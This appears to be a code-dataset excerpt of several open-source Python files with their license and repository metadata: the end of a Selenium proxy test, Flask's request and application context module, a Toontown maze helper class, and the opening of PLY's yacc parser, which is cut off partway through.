proxy.proxy_autoconfig_url) def testCanInitEmptyProxy(self): proxy = Proxy() self.assertEqual(ProxyType.UNSPECIFIED, proxy.proxy_type) self.assertEqual('', proxy.http_proxy) self.assertEqual('', proxy.ftp_proxy) self.assertEqual('', proxy.no_proxy) self.assertEqual('', proxy.sslProxy) self.assertEqual('', proxy.socksProxy) self.assertEqual('', proxy.socksUsername) self.assertEqual('', proxy.socksPassword) self.assertEqual(False, proxy.auto_detect) self.assertEqual('', proxy.proxy_autoconfig_url) desired_capabilities = {} proxy.add_to_capabilities(desired_capabilities) proxy_capabilities = {} proxy_capabilities['proxyType'] = 'UNSPECIFIED' expected_capabilities = {'proxy': proxy_capabilities} self.assertEqual(expected_capabilities, desired_capabilities)
apache-2.0
Kamik423/uni_plan
plan/plan/lib64/python3.4/site-packages/flask/ctx.py
170
14739
# -*- coding: utf-8 -*- """ flask.ctx ~~~~~~~~~ Implements the objects required to keep the context. :copyright: (c) 2015 by Armin Ronacher. :license: BSD, see LICENSE for more details. """ import sys from functools import update_wrapper from werkzeug.exceptions import HTTPException from .globals import _request_ctx_stack, _app_ctx_stack from .signals import appcontext_pushed, appcontext_popped from ._compat import BROKEN_PYPY_CTXMGR_EXIT, reraise # a singleton sentinel value for parameter defaults _sentinel = object() class _AppCtxGlobals(object): """A plain object.""" def get(self, name, default=None): return self.__dict__.get(name, default) def pop(self, name, default=_sentinel): if default is _sentinel: return self.__dict__.pop(name) else: return self.__dict__.pop(name, default) def setdefault(self, name, default=None): return self.__dict__.setdefault(name, default) def __contains__(self, item): return item in self.__dict__ def __iter__(self): return iter(self.__dict__) def __repr__(self): top = _app_ctx_stack.top if top is not None: return '<flask.g of %r>' % top.app.name return object.__repr__(self) def after_this_request(f): """Executes a function after this request. This is useful to modify response objects. The function is passed the response object and has to return the same or a new one. Example:: @app.route('/') def index(): @after_this_request def add_header(response): response.headers['X-Foo'] = 'Parachute' return response return 'Hello World!' This is more useful if a function other than the view function wants to modify a response. For instance think of a decorator that wants to add some headers without converting the return value into a response object. .. versionadded:: 0.9 """ _request_ctx_stack.top._after_request_functions.append(f) return f def copy_current_request_context(f): """A helper function that decorates a function to retain the current request context. This is useful when working with greenlets. The moment the function is decorated a copy of the request context is created and then pushed when the function is called. Example:: import gevent from flask import copy_current_request_context @app.route('/') def index(): @copy_current_request_context def do_some_work(): # do some work here, it can access flask.request like you # would otherwise in the view function. ... gevent.spawn(do_some_work) return 'Regular response' .. versionadded:: 0.10 """ top = _request_ctx_stack.top if top is None: raise RuntimeError('This decorator can only be used at local scopes ' 'when a request context is on the stack. For instance within ' 'view functions.') reqctx = top.copy() def wrapper(*args, **kwargs): with reqctx: return f(*args, **kwargs) return update_wrapper(wrapper, f) def has_request_context(): """If you have code that wants to test if a request context is there or not this function can be used. For instance, you may want to take advantage of request information if the request object is available, but fail silently if it is unavailable. :: class User(db.Model): def __init__(self, username, remote_addr=None): self.username = username if remote_addr is None and has_request_context(): remote_addr = request.remote_addr self.remote_addr = remote_addr Alternatively you can also just test any of the context bound objects (such as :class:`request` or :class:`g` for truthness):: class User(db.Model): def __init__(self, username, remote_addr=None): self.username = username if remote_addr is None and request: remote_addr = request.remote_addr self.remote_addr = remote_addr .. versionadded:: 0.7 """ return _request_ctx_stack.top is not None def has_app_context(): """Works like :func:`has_request_context` but for the application context. You can also just do a boolean check on the :data:`current_app` object instead. .. versionadded:: 0.9 """ return _app_ctx_stack.top is not None class AppContext(object): """The application context binds an application object implicitly to the current thread or greenlet, similar to how the :class:`RequestContext` binds request information. The application context is also implicitly created if a request context is created but the application is not on top of the individual application context. """ def __init__(self, app): self.app = app self.url_adapter = app.create_url_adapter(None) self.g = app.app_ctx_globals_class() # Like request context, app contexts can be pushed multiple times # but there a basic "refcount" is enough to track them. self._refcnt = 0 def push(self): """Binds the app context to the current context.""" self._refcnt += 1 if hasattr(sys, 'exc_clear'): sys.exc_clear() _app_ctx_stack.push(self) appcontext_pushed.send(self.app) def pop(self, exc=_sentinel): """Pops the app context.""" try: self._refcnt -= 1 if self._refcnt <= 0: if exc is _sentinel: exc = sys.exc_info()[1] self.app.do_teardown_appcontext(exc) finally: rv = _app_ctx_stack.pop() assert rv is self, 'Popped wrong app context. (%r instead of %r)' \ % (rv, self) appcontext_popped.send(self.app) def __enter__(self): self.push() return self def __exit__(self, exc_type, exc_value, tb): self.pop(exc_value) if BROKEN_PYPY_CTXMGR_EXIT and exc_type is not None: reraise(exc_type, exc_value, tb) class RequestContext(object): """The request context contains all request relevant information. It is created at the beginning of the request and pushed to the `_request_ctx_stack` and removed at the end of it. It will create the URL adapter and request object for the WSGI environment provided. Do not attempt to use this class directly, instead use :meth:`~flask.Flask.test_request_context` and :meth:`~flask.Flask.request_context` to create this object. When the request context is popped, it will evaluate all the functions registered on the application for teardown execution (:meth:`~flask.Flask.teardown_request`). The request context is automatically popped at the end of the request for you. In debug mode the request context is kept around if exceptions happen so that interactive debuggers have a chance to introspect the data. With 0.4 this can also be forced for requests that did not fail and outside of ``DEBUG`` mode. By setting ``'flask._preserve_context'`` to ``True`` on the WSGI environment the context will not pop itself at the end of the request. This is used by the :meth:`~flask.Flask.test_client` for example to implement the deferred cleanup functionality. You might find this helpful for unittests where you need the information from the context local around for a little longer. Make sure to properly :meth:`~werkzeug.LocalStack.pop` the stack yourself in that situation, otherwise your unittests will leak memory. """ def __init__(self, app, environ, request=None): self.app = app if request is None: request = app.request_class(environ) self.request = request self.url_adapter = app.create_url_adapter(self.request) self.flashes = None self.session = None # Request contexts can be pushed multiple times and interleaved with # other request contexts. Now only if the last level is popped we # get rid of them. Additionally if an application context is missing # one is created implicitly so for each level we add this information self._implicit_app_ctx_stack = [] # indicator if the context was preserved. Next time another context # is pushed the preserved context is popped. self.preserved = False # remembers the exception for pop if there is one in case the context # preservation kicks in. self._preserved_exc = None # Functions that should be executed after the request on the response # object. These will be called before the regular "after_request" # functions. self._after_request_functions = [] self.match_request() def _get_g(self): return _app_ctx_stack.top.g def _set_g(self, value): _app_ctx_stack.top.g = value g = property(_get_g, _set_g) del _get_g, _set_g def copy(self): """Creates a copy of this request context with the same request object. This can be used to move a request context to a different greenlet. Because the actual request object is the same this cannot be used to move a request context to a different thread unless access to the request object is locked. .. versionadded:: 0.10 """ return self.__class__(self.app, environ=self.request.environ, request=self.request ) def match_request(self): """Can be overridden by a subclass to hook into the matching of the request. """ try: url_rule, self.request.view_args = \ self.url_adapter.match(return_rule=True) self.request.url_rule = url_rule except HTTPException as e: self.request.routing_exception = e def push(self): """Binds the request context to the current context.""" # If an exception occurs in debug mode or if context preservation is # activated under exception situations exactly one context stays # on the stack. The rationale is that you want to access that # information under debug situations. However if someone forgets to # pop that context again we want to make sure that on the next push # it's invalidated, otherwise we run at risk that something leaks # memory. This is usually only a problem in test suite since this # functionality is not active in production environments. top = _request_ctx_stack.top if top is not None and top.preserved: top.pop(top._preserved_exc) # Before we push the request context we have to ensure that there # is an application context. app_ctx = _app_ctx_stack.top if app_ctx is None or app_ctx.app != self.app: app_ctx = self.app.app_context() app_ctx.push() self._implicit_app_ctx_stack.append(app_ctx) else: self._implicit_app_ctx_stack.append(None) if hasattr(sys, 'exc_clear'): sys.exc_clear() _request_ctx_stack.push(self) # Open the session at the moment that the request context is # available. This allows a custom open_session method to use the # request context (e.g. code that access database information # stored on `g` instead of the appcontext). self.session = self.app.open_session(self.request) if self.session is None: self.session = self.app.make_null_session() def pop(self, exc=_sentinel): """Pops the request context and unbinds it by doing that. This will also trigger the execution of functions registered by the :meth:`~flask.Flask.teardown_request` decorator. .. versionchanged:: 0.9 Added the `exc` argument. """ app_ctx = self._implicit_app_ctx_stack.pop() try: clear_request = False if not self._implicit_app_ctx_stack: self.preserved = False self._preserved_exc = None if exc is _sentinel: exc = sys.exc_info()[1] self.app.do_teardown_request(exc) # If this interpreter supports clearing the exception information # we do that now. This will only go into effect on Python 2.x, # on 3.x it disappears automatically at the end of the exception # stack. if hasattr(sys, 'exc_clear'): sys.exc_clear() request_close = getattr(self.request, 'close', None) if request_close is not None: request_close() clear_request = True finally: rv = _request_ctx_stack.pop() # get rid of circular dependencies at the end of the request # so that we don't require the GC to be active. if clear_request: rv.request.environ['werkzeug.request'] = None # Get rid of the app as well if necessary. if app_ctx is not None: app_ctx.pop(exc) assert rv is self, 'Popped wrong request context. ' \ '(%r instead of %r)' % (rv, self) def auto_pop(self, exc): if self.request.environ.get('flask._preserve_context') or \ (exc is not None and self.app.preserve_context_on_exception): self.preserved = True self._preserved_exc = exc else: self.pop(exc) def __enter__(self): self.push() return self def __exit__(self, exc_type, exc_value, tb): # do not pop the request stack if we are in debug mode and an # exception happened. This will allow the debugger to still # access the request object in the interactive shell. Furthermore # the context can be force kept alive for the test client. # See flask.testing for how this works. self.auto_pop(exc_value) if BROKEN_PYPY_CTXMGR_EXIT and exc_type is not None: reraise(exc_type, exc_value, tb) def __repr__(self): return '<%s \'%s\' [%s] of %s>' % ( self.__class__.__name__, self.request.url, self.request.method, self.app.name, )
apache-2.0
ksmit799/Toontown-Source
toontown/minigame/MazeBase.py
2
5514
from pandac.PandaModules import VBase3 from direct.showbase.RandomNumGen import RandomNumGen class MazeBase: def __init__(self, model, mazeData, cellWidth, parent = None): if parent is None: parent = render self.width = mazeData['width'] self.height = mazeData['height'] self.originTX = mazeData['originX'] self.originTY = mazeData['originY'] self.collisionTable = mazeData['collisionTable'] self._initialCellWidth = cellWidth self.cellWidth = self._initialCellWidth self.maze = model self.maze.setPos(0, 0, 0) self.maze.reparentTo(parent) self.maze.stash() return def destroy(self): self.maze.removeNode() del self.maze def onstage(self): self.maze.unstash() def offstage(self): self.maze.stash() def setScale(self, xy = 1, z = 1): self.maze.setScale(VBase3(xy, xy, z)) self.cellWidth = self._initialCellWidth * xy def isWalkable(self, tX, tY, rejectList = ()): if tX <= 0 or tY <= 0 or tX >= self.width or tY >= self.height: return 0 return not self.collisionTable[tY][tX] and not self.collisionTable[tY - 1][tX] and not self.collisionTable[tY][tX - 1] and not self.collisionTable[tY - 1][tX - 1] and (tX, tY) not in rejectList def tile2world(self, TX, TY): return [(TX - self.originTX) * self.cellWidth, (TY - self.originTY) * self.cellWidth] def world2tile(self, x, y): return [int(x / self.cellWidth + self.originTX), int(y / self.cellWidth + self.originTY)] def world2tileClipped(self, x, y): coords = [int(x / self.cellWidth + self.originTX), int(y / self.cellWidth + self.originTY)] coords[0] = min(max(coords[0], 0), self.width - 1) coords[1] = min(max(coords[1], 0), self.height - 1) return coords def doOrthoCollisions(self, oldPos, newPos): offset = newPos - oldPos WALL_OFFSET = 1.0 curX = oldPos[0] curY = oldPos[1] curTX, curTY = self.world2tile(curX, curY) def calcFlushCoord(curTile, newTile, centerTile): EPSILON = 0.01 if newTile > curTile: return (newTile - centerTile) * self.cellWidth - EPSILON - WALL_OFFSET else: return (curTile - centerTile) * self.cellWidth + WALL_OFFSET offsetX = offset[0] offsetY = offset[1] WALL_OFFSET_X = WALL_OFFSET if offsetX < 0: WALL_OFFSET_X = -WALL_OFFSET_X WALL_OFFSET_Y = WALL_OFFSET if offsetY < 0: WALL_OFFSET_Y = -WALL_OFFSET_Y newX = curX + offsetX + WALL_OFFSET_X newY = curY newTX, newTY = self.world2tile(newX, newY) if newTX != curTX: if self.collisionTable[newTY][newTX] == 1: offset.setX(calcFlushCoord(curTX, newTX, self.originTX) - curX) newX = curX newY = curY + offsetY + WALL_OFFSET_Y newTX, newTY = self.world2tile(newX, newY) if newTY != curTY: if self.collisionTable[newTY][newTX] == 1: offset.setY(calcFlushCoord(curTY, newTY, self.originTY) - curY) offsetX = offset[0] offsetY = offset[1] newX = curX + offsetX + WALL_OFFSET_X newY = curY + offsetY + WALL_OFFSET_Y newTX, newTY = self.world2tile(newX, newY) if self.collisionTable[newTY][newTX] == 1: cX = calcFlushCoord(curTX, newTX, self.originTX) cY = calcFlushCoord(curTY, newTY, self.originTY) if abs(cX - curX) < abs(cY - curY): offset.setX(cX - curX) else: offset.setY(cY - curY) return oldPos + offset def createRandomSpotsList(self, numSpots, randomNumGen): randomNumGen = RandomNumGen(randomNumGen) width = self.width height = self.height halfWidth = int(width / 2) halfHeight = int(height / 2) quadrants = [(0, 0, halfWidth - 1, halfHeight - 1), (halfWidth, 0, width - 1, halfHeight - 1), (0, halfHeight, halfWidth - 1, height - 1), (halfWidth, halfHeight, width - 1, height - 1)] spotsTaken = [] def getEmptySpotInQuadrant(quadrant): tX = -1 tY = -1 while tX < 0 or not self.isWalkable(tX, tY, spotsTaken): tX = randomNumGen.randint(quadrant[0], quadrant[2]) tY = randomNumGen.randint(quadrant[1], quadrant[3]) spot = (tX, tY) spotsTaken.append(spot) return spot def getSpotList(length): randomNumGen.shuffle(quadrants) l = [] remaining = length for quadrant in quadrants: for u in range(int(length / 4)): l.append(getEmptySpotInQuadrant(quadrant)) remaining -= int(length / 4) for u in range(remaining): quadrant = quadrants[randomNumGen.randint(0, len(quadrants) - 1)] l.append(getEmptySpotInQuadrant(quadrant)) return l if type(numSpots) == tuple or type(numSpots) == list: spots = [] for i in numSpots: spots.append(getSpotList(i)) return spots return getSpotList(numSpots)
mit
srm912/servo
components/script/dom/bindings/codegen/ply/ply/yacc.py
319
128492
# ----------------------------------------------------------------------------- # ply: yacc.py # # Copyright (C) 2001-2009, # David M. Beazley (Dabeaz LLC) # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # * Neither the name of the David Beazley or Dabeaz LLC may be used to # endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ----------------------------------------------------------------------------- # # This implements an LR parser that is constructed from grammar rules defined # as Python functions. The grammer is specified by supplying the BNF inside # Python documentation strings. The inspiration for this technique was borrowed # from John Aycock's Spark parsing system. PLY might be viewed as cross between # Spark and the GNU bison utility. # # The current implementation is only somewhat object-oriented. The # LR parser itself is defined in terms of an object (which allows multiple # parsers to co-exist). However, most of the variables used during table # construction are defined in terms of global variables. Users shouldn't # notice unless they are trying to define multiple parsers at the same # time using threads (in which case they should have their head examined). # # This implementation supports both SLR and LALR(1) parsing. LALR(1) # support was originally implemented by Elias Ioup (ezioup@alumni.uchicago.edu), # using the algorithm found in Aho, Sethi, and Ullman "Compilers: Principles, # Techniques, and Tools" (The Dragon Book). LALR(1) has since been replaced # by the more efficient DeRemer and Pennello algorithm. # # :::::::: WARNING ::::::: # # Construction of LR parsing tables is fairly complicated and expensive. # To make this module run fast, a *LOT* of work has been put into # optimization---often at the expensive of readability and what might # consider to be good Python "coding style." Modify the code at your # own risk! # ---------------------------------------------------------------------------- __version__ = "3.3" __tabversion__ = "3.2" # Table version #----------------------------------------------------------------------------- # === User configurable parameters === # # Change these to modify the default behavior of yacc (if you wish) #----------------------------------------------------------------------------- yaccdebug = 1 # Debugging mode. If set, yacc generates a # a 'parser.out' file in the current directory debug_file = 'parser.out' # Default name of the debugging file tab_module = 'parsetab' # Default name of the table module default_lr = 'LALR' # Default LR table generation method error_count = 3 # Number of symbols that must be shifted to leave recovery mode yaccdevel = 0 # Set to True if developing yacc. This turns off optimized # implementations of certain functions. resultlimit = 40 # Size limit of results when running in debug mode. pickle_protocol = 0 # Protocol to use when writing pickle files import re, types, sys, os.path # Compatibility function for python 2.6/3.0 if sys.version_info[0] < 3: def func_code(f): return f.func_code else: def func_code(f): return f.__code__ # Compatibility try: MAXINT = sys.maxint except AttributeError: MAXINT = sys.maxsize # Python 2.x/3.0 compatibility. def load_ply_lex(): if sys.version_info[0] < 3: import lex else: import ply.lex as lex return lex # This object is a stand-in for a logging object created by the # logging module. PLY will use this by default to create things # such as the parser.out file. If a user wants more detailed # information, they can create their own logging object and pass # it into PLY. class PlyLogger(object): def __init__(self,f): self.f = f def debug(self,msg,*args,**kwargs): self.f.write((msg % args) + "\n") info = debug def warning(self,msg,*args,**kwargs): self.f.write("WARNING: "+ (msg % args) + "\n") def error(self,msg,*args,**kwargs): self.f.write("ERROR: " + (msg % args) + "\n") critical = debug # Null logger is used when no output is generated. Does nothing. class NullLogger(object): def __getattribute__(self,name): return self def __call__(self,*args,**kwargs): return self # Exception raised for yacc-related errors class YaccError(Exception): pass # Format the result message that the parser produces when running in debug mode. def format_result(r): repr_str = repr(r) if '\n' in repr_str: repr_str = repr(repr_str) if len(repr_str) > resultlimit: repr_str = repr_str[:resultlimit]+" ..." result = "<%s @ 0x%x> (%s)" % (type(r).__name__,id(r),repr_str) return result # Format stack entries when the parser is running in debug mode def format_stack_entry(r): repr_str = repr(r) if '\n' in repr_str: repr_str = repr(repr_str) if len(repr_str) < 16: return repr_str else: return "<%s @ 0x%x>" % (type(r).__name__,id(r)) #----------------------------------------------------------------------------- # === LR Parsing Engine === # # The following classes are used for the LR parser itself. These are not # used during table construction and are independent of the actual LR # table generation algorithm #----------------------------------------------------------------------------- # This class is used to hold non-terminal grammar symbols during parsing. # It normally has the following attributes set: # .type = Grammar symbol type # .value = Symbol value # .lineno = Starting line number # .endlineno = Ending line number (optional, set automatically) # .lexpos = Starting lex position # .endlexpos = Ending lex position (optional, set automatically) class YaccSymbol: def __str__(self): return self.type def __repr__(self): return str(self) # This class is a wrapper around the objects actually passed to each # grammar rule. Index lookup and assignment actually assign the # .value attribute of the underlying YaccSymbol object. # The lineno() method returns the line number of a given # item (or 0 if not defined). The linespan() method returns # a tuple of (startline,endline) representing the range of lines # for a symbol. The lexspan() method returns a tuple (lexpos,endlexpos) # representing the range of positional information for a symbol. class YaccProduction: def __init__(self,s,stack=None): self.slice = s self.stack = stack self.lexer = None self.parser= None def __getitem__(self,n): if n >= 0: return self.slice[n].value else: return self.stack[n].value def __setitem__(self,n,v): self.slice[n].value = v def __getslice__(self,i,j): return [s.value for s in self.slice[i:j]] def __len__(self): return len(self.slice) def lineno(self,n): return getattr(self.slice[n],"lineno",0) def set_lineno(self,n,lineno): self.slice[n].lineno = lineno def linespan(self,n): startline = getattr(self.slice[n],"lineno",0) endline = getattr(self.slice[n],"endlineno",startline) return startline,endline def lexpos(self,n): return getattr(self.slice[n],"lexpos",0) def lexspan(self,n): startpos = getattr(self.slice[n],"lexpos",0) endpos = getattr(self.slice[n],"endlexpos",startpos) return startpos,endpos def error(self): raise SyntaxError # ----------------------------------------------------------------------------- # == LRParser == # # The LR Parsing engine. # ----------------------------------------------------------------------------- class LRParser: def __init__(self,lrtab,errorf): self.productions = lrtab.lr_productions self.action = lrtab.lr_action self.goto = lrtab.lr_goto self.errorfunc = errorf def errok(self): self.errorok = 1 def restart(self): del self.statestack[:] del self.symstack[:] sym = YaccSymbol() sym.type = '$end' self.symstack.append(sym) self.statestack.append(0) def parse(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None): if debug or yaccdevel: if isinstance(debug,int): debug = PlyLogger(sys.stderr) return self.parsedebug(input,lexer,debug,tracking,tokenfunc) elif tracking: return self.parseopt(input,lexer,debug,tracking,tokenfunc) else: return self.parseopt_notrack(input,lexer,debug,tracking,tokenfunc) # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # parsedebug(). # # This is the debugging enabled version of parse(). All changes made to the # parsing engine should be made here. For the non-debugging version, # copy this code to a method parseopt() and delete all of the sections # enclosed in: # # #--! DEBUG # statements # #--! DEBUG # # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! def parsedebug(self,input=None,lexer=None,debug=None,tracking=0,tokenfunc=None): lookahead = None # Current lookahead symbol lookaheadstack = [ ] # Stack of lookahead symbols actions = self.action # Local reference to action table (to avoid lookup on self.) goto = self.goto # Local reference to goto table (to avoid lookup on self.) prod = self.productions # Local reference to production list (to avoid lookup on self.) pslice = YaccProduction(None) # Production object passed to grammar rules errorcount = 0 # Used during error recovery # --! DEBUG debug.info("PLY: PARSE DEBUG START") # --! DEBUG # If no lexer was given, we will try to use the lex module if not lexer: lex = load_ply_lex() lexer = lex.lexer # Set up the lexer and parser objects on pslice pslice.lexer = lexer pslice.parser = self # If input was supplied, pass to lexer if input is not None: lexer.input(input) if tokenfunc is None: # Tokenize function get_token = lexer.token else: get_token = tokenfunc # Set up the state and symbol stacks statestack = [ ] # Stack of parsing states self.statestack = statestack symstack = [ ] # Stack of grammar symbols self.symstack = symstack pslice.stack = symstack # Put in the production errtoken = None # Err token # The start state is assumed to be (0,$end) statestack.append(0) sym = YaccSymbol() sym.type = "$end" symstack.append(sym) state = 0 while 1: # Get the next symbol on the input. If a lookahead symbol # is already set, we just use that. Otherwise, we'll pull # the next token off of the lookaheadstack or from the lexer # --! DEBUG debug.debug('') debug.debug('State : %s', state) # --! DEBUG if not lookahead: if not lookaheadstack: lookahead = get_token() # Get the next token else: lookahead = lookaheadstack.pop() if not lookahead: lookahead = YaccSymbol() lookahead.type = "$end" # --! DEBUG debug.debug('Stack : %s', ("%s . %s" % (" ".join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip()) # --! DEBUG # Check the action table ltype = lookahead.type t = actions[state].get(ltype) if t is not None: if t > 0: # shift a symbol on the stack statestack.append(t) state = t # --! DEBUG debug.debug("Action : Shift and goto state %s", t) # --! DEBUG symstack.append(lookahead) lookahead = None # Decrease error count on successful shift if errorcount: errorcount -=1 continue if t < 0: # reduce a symbol on the stack, emit a production p = prod[-t] pname = p.name plen = p.len # Get production function sym = YaccSymbol() sym.type = pname # Production name sym.value = None # --! DEBUG if plen: debug.info("Action : Reduce rule [%s] with %s and goto state %d", p.str, "["+",".join([format_stack_entry(_v.value) for _v in symstack[-plen:]])+"]",-t) else: debug.info("Action : Reduce rule [%s] with %s and goto state %d", p.str, [],-t) # --! DEBUG if plen: targ = symstack[-plen-1:] targ[0] = sym # --! TRACKING if tracking: t1 = targ[1] sym.lineno = t1.lineno sym.lexpos = t1.lexpos t1 = targ[-1] sym.endlineno = getattr(t1,"endlineno",t1.lineno) sym.endlexpos = getattr(t1,"endlexpos",t1.lexpos) # --! TRACKING # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # The code enclosed in this section is duplicated # below as a performance optimization. Make sure # changes get made in both locations. pslice.slice = targ try: # Call the grammar rule with our special slice object del symstack[-plen:] del statestack[-plen:] p.callable(pslice) # --! DEBUG debug.info("Result : %s", format_result(pslice[0])) # --! DEBUG symstack.append(sym) state = goto[statestack[-1]][pname] statestack.append(state) except SyntaxError: # If an error was set. Enter error recovery state lookaheadstack.append(lookahead) symstack.pop() statestack.pop() state = statestack[-1] sym.type = 'error' lookahead = sym errorcount = error_count self.errorok = 0 continue # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! else: # --! TRACKING if tracking: sym.lineno = lexer.lineno sym.lexpos = lexer.lexpos # --! TRACKING targ = [ sym ] # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # The code enclosed in this section is duplicated # above as a performance optimization. Make sure # changes get made in both locations. pslice.slice = targ try: # Call the grammar rule with our special slice object p.callable(pslice) # --! DEBUG debug.info("Result : %s", format_result(pslice[0])) # --! DEBUG symstack.append(sym) state = goto[statestack[-1]][pname] statestack.append(state) except SyntaxError: # If an error was set. Enter error recovery state lookaheadstack.append(lookahead) symstack.pop() statestack.pop() state = statestack[-1] sym.type = 'error' lookahead = sym errorcount = error_count self.errorok = 0 continue # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! if t == 0: n = symstack[-1] result = getattr(n,"value",None) # --! DEBUG debug.info("Done : Returning %s", format_result(result)) debug.info("PLY: PARSE DEBUG END") # --! DEBUG return result if t == None: # --! DEBUG debug.error('Error : %s', ("%s . %s" % (" ".join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip()) # --! DEBUG # We have some kind of parsing error here. To handle # this, we are going to push the current token onto # the tokenstack and replace it with an 'error' token. # If there are any synchronization rules, they may # catch it. # # In addition to pushing the error token, we call call # the user defined p_error() function if this is the # first syntax error. This function is only called if # errorcount == 0. if errorcount == 0 or self.errorok: errorcount = error_count self.errorok = 0 errtoken = lookahead if errtoken.type == "$end": errtoken = None # End of file! if self.errorfunc: global errok,token,restart errok = self.errok # Set some special functions available in error recovery token = get_token restart = self.restart if errtoken and not hasattr(errtoken,'lexer'): errtoken.lexer = lexer tok = self.errorfunc(errtoken) del errok, token, restart # Delete special functions if self.errorok: # User must have done some kind of panic # mode recovery on their own. The # returned token is the next lookahead lookahead = tok errtoken = None continue else: if errtoken: if hasattr(errtoken,"lineno"): lineno = lookahead.lineno else: lineno = 0 if lineno: sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type)) else: sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type) else: sys.stderr.write("yacc: Parse error in input. EOF\n") return else: errorcount = error_count # case 1: the statestack only has 1 entry on it. If we're in this state, the # entire parse has been rolled back and we're completely hosed. The token is # discarded and we just keep going. if len(statestack) <= 1 and lookahead.type != "$end": lookahead = None errtoken = None state = 0 # Nuke the pushback stack del lookaheadstack[:] continue # case 2: the statestack has a couple of entries on it, but we're # at the end of the file. nuke the top entry and generate an error token # Start nuking entries on the stack if lookahead.type == "$end": # Whoa. We're really hosed here. Bail out return if lookahead.type != 'error': sym = symstack[-1] if sym.type == 'error': # Hmmm. Error is on top of stack, we'll just nuke input # symbol and continue lookahead = None continue t = YaccSymbol() t.type = 'error' if hasattr(lookahead,"lineno"): t.lineno = lookahead.lineno t.value = lookahead lookaheadstack.append(lookahead) lookahead = t else: symstack.pop() statestack.pop() state = statestack[-1] # Potential bug fix continue # Call an error function here raise RuntimeError("yacc: internal parser error!!!\n") # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # parseopt(). # # Optimized version of parse() method. DO NOT EDIT THIS CODE DIRECTLY. # Edit the debug version above, then copy any modifications to the method # below while removing #--! DEBUG sections. # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! def parseopt(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None): lookahead = None # Current lookahead symbol lookaheadstack = [ ] # Stack of lookahead symbols actions = self.action # Local reference to action table (to avoid lookup on self.) goto = self.goto # Local reference to goto table (to avoid lookup on self.) prod = self.productions # Local reference to production list (to avoid lookup on self.) pslice = YaccProduction(None) # Production object passed to grammar rules errorcount = 0 # Used during error recovery # If no lexer was given, we will try to use the lex module if not lexer: lex = load_ply_lex() lexer = lex.lexer # Set up the lexer and parser objects on pslice pslice.lexer = lexer pslice.parser = self # If input was supplied, pass to lexer if input is not None: lexer.input(input) if tokenfunc is None: # Tokenize function get_token = lexer.token else: get_token = tokenfunc # Set up the state and symbol stacks statestack = [ ] # Stack of parsing states self.statestack = statestack symstack = [ ] # Stack of grammar symbols self.symstack = symstack pslice.stack = symstack # Put in the production errtoken = None # Err token # The start state is assumed to be (0,$end) statestack.append(0) sym = YaccSymbol() sym.type = '$end' symstack.append(sym) state = 0 while 1: # Get the next symbol on the input. If a lookahead symbol # is already set, we just use that. Otherwise, we'll pull # the next token off of the lookaheadstack or from the lexer if not lookahead: if not lookaheadstack: lookahead = get_token() # Get the next token else: lookahead = lookaheadstack.pop() if not lookahead: lookahead = YaccSymbol() lookahead.type = '$end' # Check the action table ltype = lookahead.type t = actions[state].get(ltype) if t is not None: if t > 0: # shift a symbol on the stack statestack.append(t) state = t symstack.append(lookahead) lookahead = None # Decrease error count on successful shift if errorcount: errorcount -=1 continue if t < 0: # reduce a symbol on the stack, emit a production p = prod[-t] pname = p.name plen = p.len # Get production function sym = YaccSymbol() sym.type = pname # Production name sym.value = None if plen: targ = symstack[-plen-1:] targ[0] = sym # --! TRACKING if tracking: t1 = targ[1] sym.lineno = t1.lineno sym.lexpos = t1.lexpos t1 = targ[-1] sym.endlineno = getattr(t1,"endlineno",t1.lineno) sym.endlexpos = getattr(t1,"endlexpos",t1.lexpos) # --! TRACKING # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # The code enclosed in this section is duplicated # below as a performance optimization. Make sure # changes get made in both locations. pslice.slice = targ try: # Call the grammar rule with our special slice object del symstack[-plen:] del statestack[-plen:] p.callable(pslice) 